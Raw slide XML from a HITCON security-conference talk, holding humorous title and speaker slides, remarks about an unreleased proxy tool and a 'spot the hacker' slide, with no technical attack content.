              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="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Not ready for release</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="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Not Open sourced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="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Maintain control over the project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Keep people from seeing how bad of a coder I actually am</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="482" name="Shape 482"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="5448300"/>
            <a:ext cy="1943100" cx="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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6" name="Shape 486"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Shape 487"/>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code looks like this</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Shape 488"/>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0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="489" name="Shape 489"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="926612" x="2302287"/>
            <a:ext cy="3404575" cx="4539424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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3" name="Shape 493"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Shape 494"/>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QUESTIONS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Shape 495"/>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381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Anything but about the proxy</a:t>
            </a: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lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Shape 496"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="1270275" x="1066875"/>
            <a:ext cy="3943274" cx="7010251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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0" name="Shape 500"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Shape 501"/>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THANK YOU HITCON</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Shape 502"/>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marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="503" name="Shape 503"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="2224400"/>
            <a:ext cy="4370449" cx="46951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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Shape 129"/>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4850" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="4850" lang="en-US" i="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>WHO THE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4850" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>HELL?!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Shape 130"/>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0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131" name="Shape 131"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="2628900"/>
            <a:ext cy="3886200" cx="38862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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="Shape 136"/>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4850" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>MATT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr strike="noStrike" u="none" b="0" cap="none" baseline="0" sz="4850" i="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
              <a:latin typeface="Impact"/>
              <a:ea typeface="Impact"/>
              <a:cs typeface="Impact"/>
              <a:sym typeface="Impact"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Shape 137"/>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381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Apparently works with Chris</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sometimes found at the office</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-381000" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="AD0101"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Does “security” stuff</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y="0" x="0"/>
          <a:ext cy="0" cx="0"/>
          <a:chOff y="0" x="0"/>
          <a:chExt cy="0" cx="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Shape 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4572000" x="762000"/>
            <a:ext cy="1600199" cx="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="b" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="0" marL="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="262626"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Impact"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5400" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Impact"/>
                <a:ea typeface="Impact"/>
                <a:cs typeface="Impact"/>
                <a:sym typeface="Impact"/>
              </a:rPr>
              <a:t>spot the hacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Shape 143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="685800" x="762000"/>
            <a:ext cy="3886200" cx="7543800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45700" rIns="91425" lIns="91425" tIns="45700" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" lvl="0" marR="0" indent="-121920" marL="274320">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Shape 144"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off y="982625" x="2179087"/>
            <a:ext cy="3589374" cx="4785833"/>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